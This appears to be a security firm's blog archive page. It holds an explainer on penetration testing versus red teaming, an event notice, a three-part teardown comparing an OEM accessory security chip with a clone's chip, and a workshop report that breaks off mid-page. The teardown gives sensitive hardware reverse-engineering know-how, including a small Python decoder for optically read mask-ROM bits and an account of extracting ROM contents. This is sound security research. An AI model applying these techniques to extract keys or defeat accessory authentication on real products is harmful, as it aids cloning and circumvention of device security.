INSIGHTS, RESEARCH | May 2, 2024

Untested Is Untrusted: Penetration Tests and Red Teaming Key to Mature Security Strategy

Organizations need to know how well their defenses can withstand a targeted attack. Red team exercises and penetration tests fit the bill, but which is right for your organization?

Information security at even well-defended enterprises is often a complex mesh of controls, policies, people, and point solutions dispersed across critical systems both inside and outside the corporate perimeter. Managing that murky situation can be challenging for security teams, many of whom are understaffed and forced to simply check as many of the boxes as they can on the organization’s framework of choice and hope for the best.

Even in a known hostile climate replete with ransomware, sophisticated bad actors, and costly data breaches, security teams are often pressured to deploy tools and coordinate with disparate IT teams, then left to stand guard: monitoring, analyzing, patching, responding, and recovering.

This largely reactive posture is table stakes for most defenders, but on its own, it leaves one important question hanging: how well will all these defenses work when the bad guys come calling? Like an orchestra of talented musicians that has never had a dress rehearsal, or a well-conditioned team of athletes that has never scrimmaged, it's difficult to know just how well the group will perform under real-world conditions. In information security in particular, organizations are often unsure if their defenses will hold in an increasingly hostile world – a world with endless vulnerabilities, devastating exploits, and evolving attackers with powerful tools and expanding capabilities.

Security’s Testing Imperative

At its heart, effective security infrastructure is a finely engineered system. Optimizing and maintaining that system can benefit greatly from the typical engineer's inclination to both build and test. From bird feeders to bridges, sewing machines to skyscrapers, no industrial product survives the journey from design to production without being pushed to its limits – and beyond – to see how it will fare in actual use. Tensile strength, compressive parameters, shear forces, thermal capacity, points of failure: every potential weakness is fair game. The concept of stress testing is common in every engineering discipline. Security should be no exception.

Security systems aren’t subjected to blistering heat, abrasive friction, or crushing weight, of course. But the best ones are regularly probed, prodded, and pushed to their technical limits. To accomplish this, organizations turn to one of two core testing methodologies: the traditional penetration test, and the more robust red team exercise. Both penetration testing and red teaming are proven, well-documented approaches for establishing the effectiveness of an organization’s defenses.

Determining which one is best for a particular organization comes down to understanding how penetration tests and red team exercises work and how they differ in practice, core purpose, and scope.

Penetration Testing: Going Beyond Vulnerability Assessment

Penetration Tests (“pentests” for short) are a proactive form of application and infrastructure security evaluation in which an ethical hacker is authorized to scan an organization’s systems to discover weaknesses that could lead to compromise or a data breach. The pentester’s objectives are to identify vulnerabilities in the client environment, exploit them to demonstrate the vulnerability’s impact, and document the findings.

Penetration testing is generally considered the next step up from traditional vulnerability assessments. Vulnerability assessments – usually the product of software-driven, automated scanning and reporting – expose many unaddressed weaknesses by cross-referencing the client’s systems and software with public lists of known vulnerabilities. Penetration testing takes the discipline a step further, adding the expert human element in order to recreate the steps a real cybercriminal might take to compromise systems. Techniques such as vulnerability scanning, brute-force password attacks, web app exploitation, and social engineering can be included in the test’s stated parameters.

Penetration tests are more targeted and deliver a more accurate list of vulnerabilities present than a vulnerability assessment. Because exploitation is often included, the pentest shows client organizations which vulnerabilities pose the biggest risk of damage, helping to prioritize mitigation efforts. However, because penetration tests are usually contracted with strict guidelines for time and scope – and because internal stakeholders are generally aware the pentest is taking place – they provide little value for measuring detection and response, and no visibility into the security posture of IT assets outside the scope of the examination.

Penetration Testing in Action

Traditional penetration tests are a go-to approach for organizations that want to immediately address exploitable vulnerabilities and upgrade their approach beyond static vulnerability scanning. Pentests provide valuable benefits in use cases such as:

  • Unearthing hidden risk: Penetration tests identify critical weaknesses in a single system, app or network that automated scanning tools often miss. As a bonus, pentests weed out the false positives from machine scanning that can waste valuable security team resources.
  • Validating security measures: Penetration testing can help validate the effectiveness of security controls, policies, and procedures, ensuring they work as intended.
  • Governance and compliance: Penetration testing allows an organization to check and prove that security policies, regulations and other related mandates are being met, including those that explicitly require regular pentests.
  • Security training: The reported outcome of a penetration test makes for a valuable training tool for both security teams and end users, helping them understand how vulnerabilities can impact their organization.

  • Business continuity planning: Penetration testing also supports the organization’s business continuity plan, identifying potential threats and vulnerabilities that could result in system downtime and data loss.

Red Team Exercises: Laser-Focused Attacks, Big-Picture Results

Red Teams take a more holistic — and more aggressive — approach to testing an organization’s overall security under real-world conditions. Groups of expert ethical hackers simulate persistent adversarial attempts to compromise the target’s systems, data, corporate offices, and people.

Red team exercises focus on the same tactics, techniques, and procedures (TTPs) used by real-world adversaries. Where penetration tests aim to uncover a comprehensive list of vulnerabilities, red teams emulate attacks that focus more on the damage a real adversary could inflict. Weak spots are leveraged to gain initial access, move laterally, escalate privileges, exfiltrate data, and avoid detection. The red team’s goal is to compromise an organization’s most critical digital assets – its crown jewels. Because the red team’s activities are stealthy and known only to select client executives (and sometimes dedicated “blue team” defenders from the organization’s own security team), the methodology provides far more comprehensive visibility into the organization’s security readiness and its ability to stand up against a real malicious attack. More than simply a roster of vulnerabilities, the result is a detailed report card on defenses, attack detection, and incident response that enterprises can use to make substantive changes to their programs and level up their security maturity.

Red Team Exercises in Action

Red team exercises take security assessments to the next level, challenging more mature organizations to examine points of entry within their attack surface that a malicious actor may exploit, as well as their detection and response capabilities. Red teaming proves its mettle through:

  • Real-world attack preparation: Red team exercises emulate attacks that can help organizations prepare for the real thing, exposing flaws in security infrastructure, policy, process and more.
  • Testing incident response: Red team exercises excel at testing a client’s incident response strategies, showing how quickly and effectively the internal team can detect and mitigate the threat.
  • Assessing employee awareness: In addition to grading the security team, red teaming is also used to measure security awareness among employees. Through approaches like spear phishing, business email compromise and on-site impersonation, red teams highlight areas where additional employee training is needed.
  • Evaluating physical security: Red teams go beyond basic cyberthreats, assessing the effectiveness of physical security measures — locks, card readers, biometrics, access policies, and employee behaviors — at the client’s various locations.

  • Decision support for security budgets: Finally, red team exercises provide solid, quantifiable evidence to support hiring, purchasing and other security-related budget initiatives aimed at bolstering a client’s security posture and maturity.

Stress Test Shootout: Red Teams and Penetration Tests Compared

When choosing between penetration tests and red team exercises, comparing and contrasting key attributes is helpful in determining which is best for the organization given its current situation and its goals:

  • Objective: Penetration tests identify vulnerabilities en masse and strengthen security; red team exercises simulate real-world attacks and test incident response.
  • Scope: Penetration tests are tightly defined and agreed upon before testing begins; red team exercises are goal-oriented, often encompassing the entire organization’s technical, physical, and human assets.
  • Duration: Penetration tests are typically shorter, ranging from a few days to a few weeks; red team exercises run longer, from several weeks to a few months.
  • Realism: Penetration tests may not faithfully simulate real-world threats; red team exercises are designed to closely mimic real-world attack scenarios.
  • Targets: Penetration tests examine specific systems or applications; red team exercises target the entire organization, including human, physical, and digital layers.
  • Notification: Teams are notified and aware a penetration test is taking place; red team exercises are unannounced, to mimic real attacks and test responses.
  • Best for: Penetration tests suit firms just getting started with proactive testing or those that perform limited tests on a regular cycle; red team exercises suit organizations with mature security postures that want to put their defenses to the test.

It’s also instructive to see how each testing methodology might work in a realistic scenario.

Scenario 1: Pentesting a healthcare organization

Hospitals typically feature a web of interconnected systems and devices, from patient records and research databases to Internet-capable smart medical equipment. Failure to secure any aspect can result in data compromise and catastrophic system downtime that violates patient privacy and disrupts vital services. A penetration test helps unearth a broad array of security weak spots, enabling the hospital to maintain system availability, data integrity, patient confidentiality and regulatory compliance under mandates such as the Health Insurance Portability and Accountability Act (HIPAA).

A pentest for a healthcare org might focus on specific areas of the hospital’s network or critical applications used to track and treat patients. If there are concerns around network-connected medical equipment and potential impact to patient care, a hardware pentest can uncover critical vulnerabilities an attacker could exploit to gain access, modify medication dosage, and maintain a network foothold. The results from the pentest help identify high-risk issues and prioritize remediation, but do little in the way of determining if an organization is ready and capable of responding to a breach.

Scenario 2: Red teaming a healthcare organization

While the pentest is more targeted and limited in scope, a red team exercise against the same healthcare organization includes not only all of the networks and applications, but also the employees and physical locations. Here, red team exercises focus on bypassing the hospital’s defenses to provide valuable insights into how the organization might fare against sophisticated, real-world attackers. These exercises expose technical weaknesses, risky employee behaviors, and process shortcomings, helping the hospital continually bolster its resilience.

The red team initially performs reconnaissance to profile the employees, offices, and external attack surface, looking for potential avenues for exploitation and initial access. An unmonitored side entrance, someone in scrubs tailgating a nurse into a secure area, a harmless-looking spearphish – a red team will exploit any weakness necessary to reach its goals and act on its objectives. The goal may be to access a specific fake patient record and modify the patient’s contact information, or to exfiltrate data to test the hospital’s network monitoring capabilities. In the end, the healthcare organization will have a better understanding of its readiness to withstand a sophisticated attack, where to improve its defenses, and how to respond more effectively.

Simulated Attacks, Authentic Results

In security, as in any other kind of engineered system, without testing there can be no trust. Testing approaches like penetration tests and red team exercises are paramount for modern, digital-centric organizations operating in a hostile cyber environment.

These simulated attack techniques help to identify and rectify technical as well as procedural vulnerabilities, enhancing the client’s overall cybersecurity posture. Taken together, regular penetration tests and red team exercises should be considered integral components of a robust and mature cybersecurity strategy. Most organizations will start with penetration testing to improve the security of specific applications and areas of their network, then graduate to red team exercises that measure the effectiveness of their security defenses along with their detection and response capabilities.

Organizations that prioritize such testing methods will be better equipped to defend against threats, reduce risks, and maintain the trust of their users and customers in today’s challenging digital threatscape.

INSIGHTS | April 19, 2024

Lessons Learned and S.A.F.E. Facts Shared During Lisbon’s OCP Regional Summit

I don’t recall precisely what year the change happened, but at some point, the public cloud became critical infrastructure with corresponding high national security stakes. That reality brought rapid maturity and accompanying regulatory controls for securing and protecting the infrastructure and services of cloud service providers (CSPs).

Next week at the 2024 OCP Regional Summit in Lisbon, teams will be sharing new security success stories and diving deeper into the technical elements and latest learnings in securing current generation cloud infrastructure devices. IOActive will be present throughout the event, delivering new insights related to OCP S.A.F.E. and beyond.

First thing Thursday morning (April 25, 8:50am – 9:10am | Floor 1 – Auditorium IV | Security and Data Protection track), our suave Director of Services, Alfredo Pironti, and rockstar senior security consultant and researcher, Sean Rivera, will present “Recent and Upcoming Security Trends in Cloud Low-level Hardware Devices,” where they dive deep into a new survey of real-world security issues and flaws that IOActive has encountered over recent years.

I’m lucky enough to have had a preview of the talk, and I’m confident it will open attendees’ eyes to the types of systemic vulnerabilities specialized security testing can uncover. Sean and Alfredo share these new insights on the threats associated with NVMe-based SSD disks and SR-IOV enabled cards before covering recommendations on improving secure development processes and proposing new testing scope improvements.

Shortly afterwards on Thursday (April 25, 9:55am – 10:15am | Floor 1 – Auditorium IV | Security and Data Protection track), Alfredo Pironti will be back on stage for a panel session focused on “OCP S.A.F.E. Updates” where he, along with Alex Tzonkov of AMD and Eric Eilertson of Microsoft, will discuss the latest progress and innovations behind the OCP S.A.F.E. program. I think a key component of the panel discussion will be the learnings and takeaways from the firsthand experiences of early adopters. You know how it goes…the difference between theory and practice.

I’m pretty sure both sessions will be recorded, so folks that can’t make it to lovely Lisbon this time round should be able to watch these IOActive stars present and share their knowledge and insights in the days or weeks following the OCP summit. You’ll find more information about OCP S.A.F.E. and how IOActive has been turning theory into practice on our OCP S.A.F.E. Certified Assessor page.

Both Alfredo and Sean, along with a handful of other IOActive folks, will be present throughout the Lisbon summit. Don’t be shy, say hi!

INSIGHTS, RESEARCH | April 17, 2024

Accessory Authentication – part 3/3

This is Part 3 of a 3-Part series. You can find Part 1 here and Part 2 here.

Introduction

In this post, we continue our deep dive comparison of the security processors used on a consumer product and an unlicensed clone. Our focus here will be identifying and characterizing memory arrays.

Given a suitably deprocessed sample, memories can often be recognized as such under low magnification because of their smooth, regular appearance with distinct row/address decode logic on the perimeter, as compared to analog circuitry (which contains many large elements, such as capacitors and inductors) or autorouted digital logic (fine-grained, irregular structure).

Identifying memories and classifying them by type allows the analyst to determine which ones may contain data relevant to system security and to assess the difficulty and complexity of extracting their content.

OEM Component

Initial low-magnification imaging of the OEM secure element identified 13 structures with a uniform, regular appearance consistent with memory.

Higher magnification imaging resulted in three of these structures being reclassified as non-memory (two as logic and one as analog), leaving 10 actual memories.

Figure 1. Logic circuitry initially labeled as memory due to its regular structure
Figure 2. Large capacitor in analog block

Of the remaining 10 memories, five distinct bit cell structures were identified:

  • Single-port (6T) SRAM
  • Dual-port (8T) SRAM
  • Mask ROM
  • 3T antifuse
  • Floating gate NOR flash

Single-port SRAM

13 instances of this IP were found in various sized arrays, with capacities ranging from 20 bits x 8 rows to 130 bits x 128 rows.

Some of these memories include extra columns, which appear to be intended as spares for remapping bad columns. This is a common practice in the semiconductor industry to improve yield: memories typically cover a significant fraction of the die surface and thus are responsible for a large fraction of manufacturing defects. If the device can remain operable despite a defect in a memory array, the overall yield of usable chips will be higher.

Figure 3. Substrate overview of a single-port SRAM array
Figure 4. Substrate closeup view of single-port SRAM bit cells

Dual-port SRAM

Six instances of this IP were found, each containing 320 bit cells (40 bytes).

Figure 5. Dual-port SRAM cells containing eight transistors

Mask ROM

Two instances of this IP were found, with capacities of 256 Kbits and 320 Kbits respectively. No data was visible in a substrate view of the array.

Figure 6. Substrate view of mask ROM showing no data visible

A cross section (Figure 7) showed irregular metal 1 patterns as well as contacts that did not go to any wires on metal 1, strongly suggesting this was a metal 1 programmed ROM. A plan view of metal 1 (Figure 8) confirms this. The metal 1 pattern also shows that the transistors are connected in series strings of 8 bits (with each transistor in the string either shorted by metal or not, in order to encode a logic 0 or 1 value), completing the classification of this memory as a metal 1 programmed NAND ROM.

Figure 7. Cross section of metal 1 programmed NAND ROM showing irregular metal patterns and via with unconnected top
Figure 8. Top-right corner of one ROM showing data bits and partial address decode logic
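Once the metal 1 pattern is recovered, converting the optical observations into bits is mostly bookkeeping. Below is a toy sketch of the idea in Python; the bit order within each 8-transistor string and the polarity (whether a shorted transistor encodes a 1 or a 0) are our assumptions and would need to be confirmed against known plaintext in a real extraction.

# Toy decoder for a metal-programmed NAND ROM read out optically.
# Input: per-transistor observations (True = shorted by metal 1).
# Assumptions (to be verified against the real device):
#   - 8 transistors per series string, MSB first
#   - a shorted transistor encodes logic 1
def decode_strings(shorts):
    """shorts: list of 8-element bool lists, one per NAND string."""
    out = bytearray()
    for string in shorts:
        assert len(string) == 8
        byte = 0
        for bit in string:
            byte = (byte << 1) | int(bit)
        out.append(byte)
    return bytes(out)

# Example: two strings read from a plan view of metal 1
print(decode_strings([
    [True, False, True, False, False, True, True, False],   # 0xA6
    [False, False, False, False, True, True, True, True],   # 0x0F
]).hex())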

IOActive successfully extracted the contents of both ROMs and determined that they were encrypted. Further reverse engineering would be necessary to locate the decryption circuitry in order to make use of the dumps.

Antifuse

Five instances of this IP were found, four with a capacity of 4 rows x 32 bits (128 bits) and one with a capacity of 32 rows x 64 bits (2048 bits).

The bit cells consist of three transistors (two in series and one separate) and likely function by gate dielectric breakdown: during programming, high voltage applied between a MOSFET gate and the channel causes the dielectric to rupture, creating a short circuit between the drain and gate terminals.

Antifuse memory is one-time programmable and is expensive due to the very low density (significantly larger bit cell compared to flash or ROM); however, it offers some additional security because the ruptured dielectric is too thin to see in a top-down view of the array, rendering it difficult to extract the contents of the bit cells. It is also commonly used for small memories when the complexity and re-programmability of flash memory is unnecessary, such as for storing trim values for analog blocks or remapping data for repairing manufacturing defects in SRAM arrays.

Figure 9. Antifuse array
Figure 10. Cross section of antifuse bit cells

Flash

A single instance of this IP was found, with a capacity of 1520 Kbits.

This memory uses floating-gate bit cells connected in a NOR topology, as is common for embedded flash memories on microcontrollers.

Figure 11. Substrate plan view of bit cells
Figure 12. Cross section of NOR Flash memory

Clone Component

Floorplan Overview

Figure 13. Substrate view of clone secure element after removal of metal and polysilicon

The secure element from the clone device contains three obvious memories, located at the top right, bottom left, and bottom right corners.

Lower-left Memory

The lower-left memory consists of a bit cell array with addressing logic at the top, left, and right sides. Looking closely, it appears to be part of a larger rectangular block that contains a large region of analog circuitry above the memory, as well as a small amount of digital logic.

This is consistent with the memory being some sort of flash (likely the primary code and data storage for the processor). The large analog block is probably the high voltage generation for the program/erase circuitry, while the small digital block likely controls timing of program/erase operations.  

The array appears to be structured as 32 bits (plus 2 dummy or ECC columns) x 64 blocks wide, by 2 bits * 202 rows (likely 192 + 2 dummy features + 8 spare). This gives an estimated usable array capacity of 786432 bits (98304 bytes, 96 kB).

Figure 14. Overview of bottom left (flash) memory
Figure 15. SEM substrate image of flash memory
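As a sanity check, the usable capacity falls out of simple arithmetic; a quick sketch mirroring the structure inferred above, with the dummy and spare features excluded:

# Usable capacity estimate for the clone's flash array, using the
# structure inferred above (dummy/ECC columns and spare rows excluded).
cols_per_block, blocks = 32, 64          # 2 dummy/ECC columns excluded
usable_rows = 2 * 192                    # 2 bits x 202 rows, minus dummies/spares

bits = cols_per_block * blocks * usable_rows
print(bits, bits // 8, bits // 8 // 1024)   # 786432 bits, 98304 bytes, 96 kB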

A cross section was taken, which did not show floating gates (as compared to the OEM component). This suggests that this component is likely using a SONOS bit cell or similar charge-trapping technology.

Lower-right Memory

The lower-right memory consists of two identical blocks side-by-side, mirrored left-to-right. Each block consists of 128 columns x 64 cells x 3 blocks high, for a total capacity of 49152 bits (6144 bytes, 6 kB).

Figure 16. Lower-right memory

At higher magnification, we can see that the individual bit cells consist of eight transistors, indicative of dual-port SRAM—perhaps some sort of cache or register file.

Figure 17. Dual-port SRAM on clone secure element (substrate)
Figure 18. Dual-port SRAM on clone secure element (metal 1)

Upper-right Memory

The upper-right memory consists of a 2 x 2 grid of identical tiles, each 128 columns x 160 rows (total capacity 81920 bits/10240 bytes/10 kB).

Figure 19. Upper-right SRAM array

Upon closer inspection, the bit cell consists of six transistors arranged in a classic single-port SRAM structure.

Figure 20. SEM substrate image of 6T SRAM cells
Figure 21. SEM metal 1 image of 6T SRAM cells

Concluding Remarks

The OEM component contains two more memory types (mask ROM and antifuse) than the clone component. It has double the flash memory and nearly triple the persistent storage (combined mask ROM and flash) capacity of the clone, but slightly less SRAM.

Overall, the memory technology of the clone component is significantly simpler and lower cost.

Overall Conclusions

OEMs secure their accessory markets for the following reasons:

  • To ensure an optimal user experience for their customers
  • To maintain the integrity of their platform
  • To secure their customers’ personal data
  • To secure revenue from accessory sales

OEMs routinely use security chips to protect their platforms and accessories; however, cost is an issue for OEMs when securing their platforms, which can potentially lead to their security being compromised.

Third-party solution providers, on the other hand:

  • Invest in their own labs and expertise to extract the IP necessary to make compatible solutions
  • Employ varied attack vectors with barriers to entry ranging from non-invasive toolsets costing $1,000 and up to an invasive, transistor-level silicon lab costing several million dollars
  • Often also incorporate a security chip to secure their own solutions, and to in turn lock out their competitors
  • Aim to hack the platform and have the third-party accessory market to themselves for as long as possible

INSIGHTS, RESEARCH |

Accessory Authentication – part 2/3

This is Part 2 of a 3-Part series. You can find Part 1 here and Part 3 here.

Introduction

In this post, we continue our deep dive comparison of the security processors used on a consumer product and an unlicensed clone. Our focus here will be comparing manufacturing process technology.

We already know the sizes of both dies, so given the gate density (which can be roughly estimated from the technology node or measured directly by locating and measuring a 2-input NAND gate) it’s possible to get a rough estimate for gate count. This, as well as the number of metal layers, can be used as metrics for overall device complexity and thus difficulty of reverse engineering.

For a more accurate view of device complexity, we can perform some preliminary floorplan analysis of each device and estimate the portions of die area occupied by:

  • Analog logic (generally uninteresting)
  • Digital logic (useful for gate count estimates)
  • RAM (generally uninteresting aside from estimating total bit capacity)
  • ROM/flash (allows estimating capacity and, potentially, difficulty of extraction)

OEM Component

We’ll start with the OEM secure element and take a few cross sections using our dual-beam scanning electron microscope/focused ion beam (SEM/FIB). This instrument provides imaging, material removal, and material deposition capabilities at the nanoscale.

Figure 1. SEM image showing FIB cross section of OEM component

To cross section a device, the analyst begins by using deposition gases to create a protective metal cap over the top of the region of interest. This protects the top surface from damage or contamination during the sectioning process. This is then followed by using the ion beam to make a rough cut a short distance away from the region of interest, then a finer cut to the exact location. The sample can then be imaged using the electron beam.

Figure 1 shows a large rectangular hole cut into the specimen, with the platinum cap at top center protecting the surface. Looking at the cut face, many layers of the device are visible. Upon closer inspection (Figure 2), we can see that this device has four copper interconnect layers followed by a fifth layer of aluminum.

Figure 2. Cross section with layers labeled
Figure 3. Cross-section view of OEM component showing individual transistor channels

At higher magnification (Figure 3), we can clearly see individual transistors. The silicon substrate of the device (bottom) has been etched to enhance contrast, giving it a rough appearance. The polysilicon transistor gates, seen end-on, appear as squares sitting on the substrate. The bright white pillars between the gates are tungsten contacts, connecting the source and drain terminals of each transistor to the copper interconnect above.

Figure 4. 6T SRAM bit cells on OEM component

Based on measurements of the gates, we conclude that this device is made on a 90 nm technology:

  • Contacted gate pitch: 282 nm
  • M1 pitch: 277 nm
  • 6T SRAM bit cell (Figure 4): 1470 x 660 nm (0.97 µm2)

We can also use cross sections to distinguish between various types of memory. Figure 5 is a cross section of one of the memory arrays of the OEM device, showing a distinctive double-layered structure instead of the single polysilicon gates seen in Figure 3. This is a “floating gate” nonvolatile memory element; the upper control gate is energized to select the cell while the lower floating gate stores charge, representing a single bit of memory data.

The presence of metal contacts at both sides of each floating gate transistor (rather than at either end of a string of many bits) allows us to complete the classification of this memory as NOR flash, rather than NAND.

Figure 5. Cross section of NOR flash memory on OEM component showing floating gates

The overall device is approximately 2400 x 1425 µm (3.42 mm2), broken down as:

  • 67% (2.29 mm2): memories and analog IP blocks
  • 33% (1.13 mm2): standard cell digital logic

Multiplying the logic area by an average of published cell library density figures for the 90nm node results in an estimated 475K gates of digital logic (assuming 100% density) for the OEM security processor. The actual gate count will be less than this estimate as there are some dummy/filler cells in less dense areas of the device.

Clone Component

Performing a similar analysis on the clone secure element, we see five copper and one aluminum metal layers (Figure 6).

Figure 6. Cross section of clone security processor showing layers
Figure 7. Closeup of SRAM transistors from clone security processor

Interestingly, the clone secure element is made on a more modern process node than the OEM component:

  • Contacted gate pitch: 225 nm
  • Minimum poly pitch: 158 nm
  • SRAM bit cell: 950 x 465 nm (0.45 µm2)

The transistor gates appear to still be polysilicon rather than metal.

Figure 8. NAND2 cell from clone component, substrate view with metal and polysilicon removed

These values are in-between those reported for the 65 nm and 45 nm nodes, suggesting this device is made on a 55 nm technology. The lack of metal gates (which many foundries began using at the 45 nm node) further reinforces this conclusion.

The overall device is approximately 1190 x 1150 µm (1.36 mm2), broken down as:

  • 37% (0.50 mm2): memories
  • 27% (0.36 mm2): analog blocks and bond pads
  • 31% (0.42 mm2): standard cell digital logic
  • 5% (0.07 mm2): filler cells, seal ring, and other non-functional areas

Given the roughly 0.42 mm2 of logic and measured NAND2 cell size of 717 x 1280 nm (0.92 µm2 or 1.08M gates/mm2 at 100% utilization), we estimate a total gate count of no more than 450K—slightly smaller than the OEM secure element. The actual number is likely quite a bit less than this, as a significant percentage (higher than on the OEM part) of the logic area is occupied by dummy/filler cells.
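The back-of-the-envelope formula here is simply logic area × cell density × utilization. A quick sketch of the calculation for the clone, using the measured NAND2 cell as the density reference:

# Gate-count estimate from standard-cell logic area and NAND2 cell size.
nand2_w, nand2_h = 717e-9, 1280e-9       # measured NAND2 cell, meters
logic_area_mm2 = 0.42                    # standard cell digital logic area

cell_area_um2 = nand2_w * nand2_h * 1e12          # ~0.92 um^2
density_per_mm2 = 1e6 / cell_area_um2             # ~1.08M gates/mm^2
gates_at_100pct = logic_area_mm2 * density_per_mm2
print(f"{cell_area_um2:.2f} um^2 -> {gates_at_100pct/1e3:.0f}K gates max")
# Roughly 450K gates at 100% utilization; the real count is lower
# because a significant share of the logic area is dummy/filler cells.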

In part 3, we continue our deep dive comparison of the security processors used on a consumer product and an unlicensed clone. There we will focus on identifying and characterizing the memory arrays.

INSIGHTS, RESEARCH |

Accessory Authentication – Part 1/3

This is Part 1 of a 3-Part series. You can find Part 2 here and Part 3 here.

Introduction

Manufacturers of consumer electronics often use embedded security processors to authenticate peripherals, accessories, and consumables. Third parties wishing to build unlicensed products (clones) within such an ecosystem must defeat or bypass this security for their products to function correctly.

In this series, the IOActive silicon lab team will take you on a deep dive into one such product, examining both the OEM product and the clone in detail.

Fundamentally, the goal of a third party selling an unlicensed product is for the host system to recognize their product as authentic. This can be achieved by extracting key material from an OEM or licensed accessory and putting it on a new processor (difficult, but allows the third party to manufacture an unlimited number of clones) or by recycling security processors from damaged or discarded accessories (low effort, since there is no need to defeat protections on the secure element, but the number of clones is limited by the number of security chips that the third party can find and recycle). In some cases, it may also be possible to bypass the cryptographic authentication entirely by exploiting implementation or protocol bugs in the authentication handshake.

We’ll begin our analysis by comparing the security processors from an OEM and clone device to see which path was taken in this case. The first step is to locate the processors, which can be challenging since security chips tend to have deliberately confusing or nondescript markings to frustrate reverse-engineering efforts.

Package Comparison

Figure 1. Security processor from OEM device
Figure 2. Security processor from clone device

Comparing the top-side markings, we see:

  • The first three digits of the first line are different.
  • The second line is identical.
  • The third line is completely different: three letters and three numbers on the clone versus one letter and four numbers on the OEM part.
  • The font weight of the laser engraving is lighter on the clone and heavier on the OEM.
  • There is no manufacturer logo marked on either device.
  • The pin 1 marking dot of the OEM part has a well-defined edge, while the pin 1 marker of the clone has a small ring of discoloration around it.

Both components are packaged in an 8-pin 0.5 mm pitch DFN with a thermal pad featuring a notch at pin 1 position. No distinction is visible between the devices from the underside.

Figure 3. Underside of clone component

Looking from the side, we see that the clone package is significantly thicker.

Figure 4. Side view of OEM component
Figure 5. Side view of clone component

Top Metal Comparison

At this stage of the analysis, it seems likely that the devices are different given the packaging variations, but this isn’t certain. Semiconductor vendors occasionally change packaging suppliers or use multiple factories to improve supply chain robustness, so it’s entirely possible that these components contain the same die but were packaged at different facilities. In order to tell for sure, we need to depackage them and compare the actual silicon.

After depackaging, the difference is obvious, even before putting the samples under the microscope. The OEM die is rectangular and about 2.5x the area of the clone die (3.24 mm2 for the OEM versus 1.28 mm2 for the clone). It also has a yellow-green tint to it, while the clone is pink.

Figure 6. Top metal image of OEM die
Figure 7. Top metal image of clone die

The OEM die has five gold ball bonds, three in the top left and two in the bottom left.

In contrast, the clone die has 11 pads along the top edge. Two are narrower than the rest and appear intended for factory test only, two redundant power/ground pads are full sized but unbonded (showing only probe scrub marks from factory test), and the remaining seven have indentations from copper ball bonds (which were chemically removed to leave a flat specimen surface).

Figure 8. Used bond pad on clone die (left, bond ball removed) vs. unused pad (right, showing probe mark)

The OEM die has no evidence of an antitamper mesh; however, the surface appears to be completely covered by a dense grid of power/ground lines in-between larger high-current power distribution buses. The only exception is the far-right side, which is only covered by CMP filler (dummy metal features serving no electrical function, but which aid in manufacturability). Since sensitive data lines are not exposed on the top layer, the device is still protected against basic invasive attacks.

The clone die has large power and ground distribution buses on the top edge near the bond pads, while the remainder of the surface is covered by a fine mesh of wires clearly intended to provide tamper resistance. Typically, secure elements will fail to boot and/or erase flash if any of these lines are cut or shorted while the device is under power.

Figure 9. Antitamper mesh on the clone die

Neither die has any vendor logo or obvious identifying markings on it. The OEM part has no markings whatsoever; the clone part has mask revision markings suggesting six metal layers and a nine-digit alphanumeric ID code “CID1801AA” (which returned no hits in an Internet search).

Figure 10. Die markings on clone secure processor

Concluding Thoughts

The clone security processor is clearly a different device from the OEM part rather than a recycled chip. This means that the third party behind the clone must have obtained the authentication key somehow and flashed it to their own security processor.

Interestingly, the clone processor is also a secure element with obvious antitamper features! We believe that the most likely rationale is that the third party is attempting to stifle further competition in the market—they already have to share the market with the OEM but are trying to avoid additional clones becoming available.

The clone part also looks very similar to the OEM part upon casual inspection—both are packaged in the same 8-pin DFN form factor and have markings that closely resemble one another. Normally this is a sign of a counterfeit device; however, there is little chance of the OEM buying their security chip from an untrustworthy source, so it seems doubtful that the clone chip manufacturer was intending to fool the OEM into using their part. One possible explanation is that the authentication scheme was defeated by a fourth party, not the manufacturer of the clone accessory, and that they produced this device as a drop-in equivalent to the OEM security processor to simplify design of clones. Using a footprint compatible package and marking it with the same ID number would make sense in this scenario.

In the next part of this series, we’ll compare the manufacturing process technology used on the two components.

INSIGHTS | March 27, 2024

IOActive Presents at HARRIS 2024, a Unique Workshop for Chip Reverse Engineering | Tony Moor

The Hardware Reverse Engineering Workshop (HARRIS) is the first ever annual workshop devoted solely to chip reverse engineering, and 2024 was its second year. IOActive has been present both years, and this year I attended to see what all the fuss was about.

Background

The workshop is organized by the Embedded Security group of the Max Planck Institute for Security and Privacy (MPI-SP) together with Cyber Security in the Age of Large-Scale Adversaries (CASA) and Ruhr-University Bochum (RUB).

Christof Paar is a founding member of MPI-SP, and HARRIS is his latest brainchild, following the success of the annual Conference on Cryptographic Hardware and Embedded Systems (CHES) that first took place in 1999. Considering the strong links between HARRIS and MPI-SP, it’s no surprise that the 2023 and 2024 workshops were both held there.

Day One

Upon arrival at the venue, it became immediately apparent how well-organized the event is. Registration was simple, and there were already many casual conversations going on between the organizers and attendees. Privacy is respected by way of providing white lanyards to attendees who do not wish to be photographed, while the rest receive green. Affiliations are also optional on the name tags. I estimated the attendance to be around 125, compared to last year’s number of 90. I fully expect that trend to continue given the efforts of the fine organizing committee. From my discussions, I would estimate the split was roughly 50% academia, 25% industry, and 25% government. Geographically, Singapore, USA, Canada, and the vast majority of European countries were represented.

Front-row seats at the venue within RUB

The presentations on day one were divided into four sessions, the first being my personal favorite: Sample Preparation. 😊 The standout talk for me here was by REATISS, where they really brought home two things:

  1. What a difficult job chip deprocessing is
  2. How amazing REATISS are at chip deprocessing

One of several fascinating facts that the talk illustrated was how planarity is key during deprocessing, which of course I know only too well. What I didn’t know, however (or at least what I never got around to calculating), is that the planarity required across a 1mm2 area of interest within a <10nm technology node chip is 25nm. This is equivalent to the total area of a football (soccer) pitch being flat to within 2mm. Now that is flat!

REATISS also touched on the challenges of characterizing 3D NAND Flash as well as the novel materials being utilized in the latest IC technologies, such as cobalt metallization.

Allied High Tech Products followed this with an excellent presentation of how toolset selection and a well-thought-out workflow are vital in effective chip/package deprocessing. They also showcased the deprocessing of some extreme examples of modern multi-chip packages.

Between sessions, there were informal discussions divided into different challenges in hardware reverse engineering. This was a great idea and encouraged new and old connections to discuss their techniques without giving away too much of their secret sauce. 😉

Day One concluded with a dinner at a very nice restaurant in the Bochum city center, where attendees could sit with whomever they pleased and continue discussions over a pleasant meal and drinks.

‘Livingroom’ in Bochum, the dinner venue where we concluded Day One

While some continued to socialize into the small hours, I retired to my hotel for a good night of sleep to make sure I was prepared for another day of talks, making connections, and inevitably learning lots of new things.

Day Two

